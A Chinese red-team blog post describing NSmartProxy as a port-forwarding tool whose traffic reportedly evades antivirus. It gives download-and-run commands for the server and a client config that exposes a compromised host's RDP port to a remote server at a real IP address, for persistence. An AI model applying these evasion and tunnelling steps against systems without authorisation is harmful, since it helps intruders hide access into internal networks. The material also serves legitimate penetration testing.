「攻防对抗」NSmartProxy流量特征的真实表现与应用

智能摘要 AI

在RedTeam渗透测试中，NSmartProxy工具表现出色，尤其在端口转发方面效果显著。该工具通过HTTP流量进行客户端连接，支持TCP和UDP协议，且流量特征不明显，目前未被安全软件拦截。尽管不支持Socks和HTTP隧道，但其在实战中成功绕过数字杀软，结合会话劫持实现权限维持，展现了其在渗透测试中的强大潜力。

前言

在RedTeam渗透测试中，工具的选择和效果是成功的关键之一。然而，随着杀毒软件的防护越来越严密，像FRP、NPS这样的常见穿透工具经常会被拦截，哪怕是落地不被杀，也会在后续的数据交换过程中被发现并阻止。尤其是某些数字防御系统，在拦截穿透流量方面的效果，往往要优于火*等其他防护措施。现在，许多传统的工具，经过简单二次开发已无法满足RedTeam的需求。因此，最近我开始尝试使用NSmartProxy这款工具，发现它在端口转发方面的效果非常不错。虽然它并不是万能的，但如果与其他工具结合使用，效果会更为理想。

NSmartProxy

安装服务端

wget https://github.com/tmoonlight/NSmartProxy/releases/download/1.3_alpha/nspserver_scd_linux_v1.3_alpha.zip
unzip nspserver_scd_linux_v1.3_alpha.zip
chmod +x ./NSmartProxy.ServerHost
./NSmartProxy.ServerHost

客户端配置appsettings.json文件

{
  "ProviderWebPort": 12309,         //服务器端口
  "ProviderAddress": "xx.xx.xx.xx",   //服务器地址

  //反向代理客户端列表
  "Clients": [
    {//mstsc远程控制服务
      "IP": "127.0.0.1",           //反向代理机器的ip
      "TargetServicePort": "3389"  //反向代理服务的端口
      "ConsumerPort":"3389"          //外网访问端口，如被占用，则会从20000开始按顺序分配端口
    },
    {//网站服务
      "IP": "127.0.0.1",
      "TargetServicePort": "80"
    },
    {//ftp服务
      "IP": "127.0.0.1",
      "TargetServicePort": "21",
      "IsCompress" : true,      //表示启动传输压缩
      "Description": "这是一个ftp协议。" //描述字段，方便用户在服务端界面识别
    },
    {//mosh服务 
      "IP": "192.168.0.168",    //安装mosh服务的受控端地址
      "TargetServicePort": "60002",
      "ConsumerPort": "30002",  
      "Protocol": "UDP"     //表示是一个UDP协议，如果不加以配置，则以TCP协议来转发
    }
  ]
}

这里按需配置

{
  "ProviderWebPort": 12309,         //服务器端口
  "ProviderAddress": "182.92.118.224",   //服务器地址

  //反向代理客户端列表
  "Clients": [
    {//mstsc远程控制服务
      "IP": "127.0.0.1",           //反向代理机器的ip
      "TargetServicePort": "3389"  //反向代理服务的端口
      "ConsumerPort":"3389"          //外网访问端口，如被占用，则会从20000开始按顺序分配端口
    }
  ]
}